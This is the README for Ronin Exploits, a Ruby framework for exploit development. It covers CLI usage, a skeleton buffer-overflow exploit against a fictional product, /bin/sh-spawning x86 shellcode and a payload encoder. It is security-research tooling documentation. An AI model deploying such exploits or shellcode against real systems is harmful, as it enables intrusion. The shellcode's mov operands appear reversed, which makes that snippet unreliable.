Ronin Exploits is a Ruby library for Ronin that provides exploitation and payload crafting functionality.
Ronin is a Ruby platform for exploit development and security research. Ronin allows for the rapid development and distribution of code, exploits or payloads over many common Source-Code-Management (SCM) systems.
- Define Exploits based on:
- Whether they are local or remote.
- Protocol they use.
- Contributing authors.
- Exploited behaviors.
- Disclosure status.
- Level of weaponization.
- Architectures they target.
- OSes they target.
- Products they target.
- Define Payloads based on:
- Contributing authors.
- Helpers they use.
- Define Payload Encoders:
- Architectures they target.
- OSes they target.
- Provides a simple three phase process of building, verifying and deploying Exploits and Payloads.
- Allows adding arbitrary target data to the targets of Exploits.
- Allows combining Payloads with Exploits.
- Allows using a raw-payload with an Exploit.
- Allows the addition of multiple Payload Encoders to an Exploit.
- Allows chaining multiple Payloads together.
- Provides the following Exploit classes:
- {Ronin::Exploits::Exploit}
- {Ronin::Exploits::Local}
- {Ronin::Exploits::Remote}
- {Ronin::Exploits::RemoteTCP}
- {Ronin::Exploits::RemoteUDP}
- {Ronin::Exploits::HTTP}
- {Ronin::Exploits::FTP}
- {Ronin::Exploits::Web}
- {Ronin::Exploits::LFI}
- {Ronin::Exploits::RFI}
- {Ronin::Exploits::SQLi}
- Provides the following Exploit helpers:
- {Ronin::Exploits::Helpers::Binary}
- {Ronin::Exploits::Helpers::Padding}
- {Ronin::Exploits::Helpers::BufferOverflow}
- {Ronin::Exploits::Helpers::FormatString}
- {Ronin::Exploits::Helpers::FileBuilder}
- Provides the following Payload classes:
- {Ronin::Payloads::Payload}
- {Ronin::Payloads::BinaryPayload}
- {Ronin::Payloads::ASMPayload}
- {Ronin::Payloads::Nops}
- {Ronin::Payloads::Shellcode}
- {Ronin::Payloads::BindShell}
- Provides the following Payload helpers:
- {Ronin::Payloads::Helpers::BindShell}
- Provides an API for {Ronin::PostExploitation Post-Exploitation}.
- Provides a multitude of exploit and payload generators which can create customized skeleton Ruby Exploits and Payloads.
Generate a skeleton exploit, with some custom information:
$ ronin-gen exploit example_exploit.rb \
--name Example --arch i686 --os Linux --product "Example Product" \
--status proven \
--authors Postmodern --description "This is an example."
- To generate other types of exploits specify one of the following:
local_exploitremote_exploitremote_tcp_exploitremote_udp_exploitftp_exploithttp_exploitweb_exploit
Generate a skeleton payload, with some custom information:
$ ronin-gen payload example_payload.rb \
--name Example --arch i686 --os Linux \
--authors Postmodern --description "This is an example."
- To generate other types of payloads specify one of the following:
binary_payloadshellcodenops
List available exploits:
$ ronin-exploits
Print information about an exploit:
$ ronin-exploits -n NAME -v
Build and deploy an exploit:
$ ronin-exploit -n NAME --host example.com --port 9999
Load an exploit from a file, then build and deploy it:
$ ronin-exploit -f FILE --host example.com --port 9999
Build and deploy an exploit, with a payload:
$ ronin-exploit -n NAME --host example.com --port 9999 -P PAYLOAD_NAME
Build and deploy an exploit, with a raw payload:
$ ronin-exploit -n NAME --host example.com --port 9999 --raw-payload \
`echo -en "\x66\x31\xc0\xfe\xc0\xb3\xff\xcd\x80"`
List available payloads:
$ ronin-payloads
Print information about a payload:
$ ronin-payloads -n NAME -v
Build and output a payload:
$ ronin-payload NAME
Build and output a raw unescaped payload:
$ ronin-payload NAME --raw
Load a payload from a file, then build and output it:
$ ronin-payload -f FILE
Define a remote TCP exploit:
require 'ronin/exploits/remote_tcp'
Ronin::Exploits::RemoteTCP.object do
helper :buffer_overflow
#
# Cacheable data.
#
cache do
self.name = 'test'
self.description = %{This is an example exploit.}
self.status = :potential
self.released = true
author name: 'Postmodern', organization: 'SophSec'
targeting do |t|
t.targets_arch :x86
t.targets_os 'Linux'
t.targets_software 'ExampleWare', '2.4.7b'
end
end
#
# Builds the exploit.
#
build do
@buffer = "USER #{build_buffer}\n"
end
#
# Deploys the built exploit.
#
deploy do
tcp_send @buffer
end
#
# Evacuates the deployed exploit.
#
evacuate do
tcp_send "QUIT"
end
end
Define a shellcode payload:
require 'ronin/payloads/shellcode'
Ronin::Payloads::Shellcode.object do
cache do
self.name = 'local_shell'
self.version = '0.5'
self.description = %{
Shellcode that spawns a local /bin/sh shell
}
targets_arch :x86
targets_os 'Linux'
end
build do
shellcode do
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov esp, ebx
push eax
push ebx
mov esp, ecx
xor edx, edx
int 0xb
end
end
end
Define a payload encoder:
require 'ronin/encoders/encoder'
Ronin::Encoders::Encoder.object do
#
# Cacheable data.
#
cache do
self.name = 'base64_encode'
self.description = %{Example base64 payload encoder}
self.targets_arch :x86
self.targets_os 'Linux'
end
#
# Base64 encodes the specified data.
#
def encode(data)
return data.to_s.base64_encode
end
end
- Ruby >= 1.9.1
- open_namespace ~> 0.4
- data_paths ~> 0.3
- uri-query_params ~> 0.6
- ruby-yasm ~> 0.2
- ronin-support ~> 0.6
- ronin ~> 1.6
- ronin-gen ~> 1.3
- ronin-asm ~> 0.1
- ronin-sql ~> 1.0
$ gem install ronin-exploits
$ git clone git://github.com/ronin-ruby/ronin-exploits.git
$ cd ronin-exploits/
$ bundle install
$ ./bin/ronin-exploit --help
Ronin Exploits - A Ruby library for Ronin that provides exploitation and payload crafting functionality.
Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)
This file is part of Ronin Exploits.
Ronin is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
Ronin is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with Ronin. If not, see http://www.gnu.org/licenses/.